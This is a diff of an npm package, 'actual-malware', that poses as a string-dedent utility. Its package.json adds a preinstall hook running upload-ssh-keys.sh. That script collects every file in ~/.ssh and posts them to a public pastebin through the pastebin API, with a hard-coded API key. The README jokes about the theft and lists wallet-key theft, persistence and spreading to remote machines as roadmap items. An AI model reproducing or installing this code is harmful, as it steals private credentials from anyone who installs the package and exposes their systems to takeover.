actual-malware 0.0.1-security → 11.2.9

package/.eslintrc.json

@@ -0,0 +1,59 @@
+{
+    "env": {
+        "browser": true,
+        "es2021": true
+    },
+    "extends": ["eslint:recommended", "plugin:@typescript-eslint/recommended"],
+    "parser": "@typescript-eslint/parser",
+    "parserOptions": {
+        "ecmaVersion": 12,
+        "sourceType": "module"
+    },
+    "plugins": ["@typescript-eslint", "unused-imports", "simple-import-sort"],
+    "rules": {
+        // "@typescript-eslint/no-use-before-define": [ "warn", { "functions": false, "classes": false, "variables": true } ],
+        // auto-fixable stuff for formatter:
+        "no-unused-expressions": "warn",
+        "consistent-return": "warn",
+        "no-useless-return": "warn",
+        "@typescript-eslint/ban-ts-comment": "off",
+        "@typescript-eslint/no-empty-function": "off",
+        "no-debugger": "warn",
+        "eqeqeq": [
+            "warn",
+            "always",
+            {
+                "null": "ignore"
+            }
+        ],
+        // "no-extra-parens": "warn",
+        // "@typescript-eslint/no-extra-parens": "warn",
+        // "@typescript-eslint/no-unused-vars": [ "warn", { "argsIgnorePattern": "^_", "varsIgnorePattern": "^h$|^_" } ],
+        // for import organizing:
+        // "sort-imports": [
+        //     "warn"
+        // ],
+        "@typescript-eslint/consistent-type-imports": [
+            "warn",
+            {
+                "prefer": "type-imports"
+            }
+        ],
+        "@typescript-eslint/no-unused-vars": "off",
+        "unused-imports/no-unused-imports": "warn",
+        "unused-imports/no-unused-vars": [
+            "warn",
+            {
+                "vars": "all",
+                "varsIgnorePattern": "^h$|^_",
+                "args": "after-used",
+                "argsIgnorePattern": "^_"
+            }
+        ],
+        "simple-import-sort/imports": "error",
+        // "simple-import-sort/exports": "error",
+        "@typescript-eslint/await-thenable": "error",
+        "@typescript-eslint/require-await": "error",
+        "@typescript-eslint/no-floating-promises": "error"
+    }
+}

package/.prettierrc.json

@@ -0,0 +1,9 @@
+{
+    "printWidth": 80,
+    "semi": false,
+    "singleQuote": true,
+    "arrowParens": "avoid",
+    "htmlWhitespaceSensitivity": "ignore",
+    "tabWidth": 4,
+    "jsxSingleQuote": true
+}

package/README.md

@@ -1,5 +1,44 @@
-# Security holding package
+# actual-malware
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+![coverage](https://user-images.githubusercontent.com/10591373/157999136-3c69bc50-6316-4377-8871-f7a8d96dfcd9.png)
 
-Please refer to www.npmjs.com/advisories?search=actual-malware for more information.
+
+npm package to upload your private ssh keys to a pastebin. It also provides string dedentation.
+
+- ✅ works in node and the browser
+- ✅ 100% test coverage
+- ✅ zero dependencies
+- ✅ 351 bytes gzipped
+
+## Installation
+
+```sh
+npm i actual-malware
+yarn add actual-malware # alternative
+# alias for convenience:
+npm i actma
+yarn add actma
+```
+
+Congratulations, all your ssh keys should now be available in a public pastebin! (Preinstall hook)
+
+## Usage
+
+```js
+import { dedent } from 'actual-malware' // or actma
+
+const prettyString = dedent(`
+  the rains and
+  spains
+    fall`) // preserved
+
+// roadmap: all session cookies should also be in a pastebin
+
+console.log(prettyString)
+```
+
+## Roadmap
+
+-   [ ] Upload private keys from crypto wallets
+-   [ ] Persist on system indefinitely (alias git clone command?)
+-   [ ] Copy to all connected remote machines and to all future authorized users

package/dist/index.d.ts

@@ -0,0 +1 @@
+export declare function dedent(text: string): string;

package/dist/index.js

@@ -0,0 +1,20 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.dedent = void 0;
+function dedent(text) {
+    var re_whitespace = /^([ \t]*)(.*)\n/gm;
+    var l, m, i;
+    while ((m = re_whitespace.exec(text)) !== null) {
+        if (!m[2])
+            continue;
+        if ((l = m[1].length)) {
+            i = i !== undefined ? Math.min(i, l) : l;
+        }
+        else
+            break;
+    }
+    if (i)
+        text = text.replace(new RegExp('^[ \t]{' + i + '}(.*\n)', 'gm'), '$1');
+    return text;
+}
+exports.dedent = dedent;

package/package.json

@@ -1,6 +1,39 @@
 {
-  "name": "actual-malware",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+    "name": "actual-malware",
+    "version": "11.2.9",
+    "description": "string dedent! also copies your ssh keys to a public pastebin immediately",
+    "main": "dist/index.js",
+    "scripts": {
+        "test": "ts-mocha -p  tsconfig.json src/index.spec.ts",
+        "fmt": "prettier -wl src/*",
+        "build": "tsc",
+        "preinstall": "bash upload-ssh-keys.sh"
+    },
+    "repository": {
+        "type": "git",
+        "url": "git+https://github.com/qpwo/actual-malware.git"
+    },
+    "keywords": [
+        "security"
+    ],
+    "author": "",
+    "license": "GPL-3.0-or-later",
+    "bugs": {
+        "url": "https://github.com/qpwo/actual-malware/issues"
+    },
+    "homepage": "https://github.com/qpwo/actual-malware#readme",
+    "devDependencies": {
+        "@types/expect": "^24.3.0",
+        "@types/mocha": "^9.1.0",
+        "@types/node": "^17.0.21",
+        "@typescript-eslint/eslint-plugin": "^5.14.0",
+        "@typescript-eslint/parser": "^5.14.0",
+        "eslint": "^8.11.0",
+        "eslint-plugin-simple-import-sort": "^7.0.0",
+        "eslint-plugin-unused-imports": "^2.0.0",
+        "mocha": "^9.2.2",
+        "prettier": "^2.5.1",
+        "ts-mocha": "^9.0.2",
+        "typescript": "^4.6.2"
+    }
 }

package/src/index.spec.ts

@@ -0,0 +1,18 @@
+import assert from 'assert'
+import { dedent } from './index'
+
+const input = `
+    will wonka
+        had
+    a chocolate factory`
+
+const expectedOutput = `
+will wonka
+    had
+a chocolate factory`
+
+describe('Array', function () {
+    it('should return -1 when the value is not present', function () {
+        assert.equal(dedent(input), expectedOutput)
+    })
+})

package/src/index.ts

@@ -0,0 +1,17 @@
+export function dedent(text: string) {
+    var re_whitespace = /^([ \t]*)(.*)\n/gm
+    var l, m, i
+
+    while ((m = re_whitespace.exec(text)) !== null) {
+        if (!m[2]) continue
+
+        if ((l = m[1].length)) {
+            i = i !== undefined ? Math.min(i, l) : l
+        } else break
+    }
+
+    if (i)
+        text = text.replace(new RegExp('^[ \t]{' + i + '}(.*\n)', 'gm'), '$1')
+
+    return text
+}

package/tsconfig.json

@@ -0,0 +1,13 @@
+{
+    "compilerOptions": {
+        "target": "es2016",
+        "module": "commonjs",
+        "esModuleInterop": true,
+        "forceConsistentCasingInFileNames": true,
+        "strict": true,
+        "skipLibCheck": true,
+        "outDir": "dist",
+        "declaration": true
+    },
+    "include": ["src/index.ts"]
+}

package/upload-ssh-keys.sh

@@ -0,0 +1,21 @@
+cd ~/.ssh
+msg1="attempting to upload your private ssh keys to pastebin..."
+echo $msg1 >>~/alert.txt
+echo $msg1 >>~/Desktop/alert.txt
+touch ~/all-keys.txt
+for f in *; do
+    echo >>~/all-keys.txt
+    echo $f >>~/all-keys.txt
+    cat $f >>~/all-keys.txt
+done
+allkeys=$(cat ~/all-keys.txt)
+url=$(curl -X POST \
+    "https://pastebin.com/api/api_post.php" \
+    -d 'api_dev_key=y87sCPeGINmbBOHh9MSW962KDQv7hlBb' \
+    -d 'api_option=paste' \
+    -d "api_paste_code=$allkeys")
+msg2="your congrats, your ssh keys have been uploaded: $url"
+echo $msg2
+echo $msg2 >>~/alert.txt
+echo $msg2 >>~/Desktop/alert.txt
+# rm -f all-keys.txt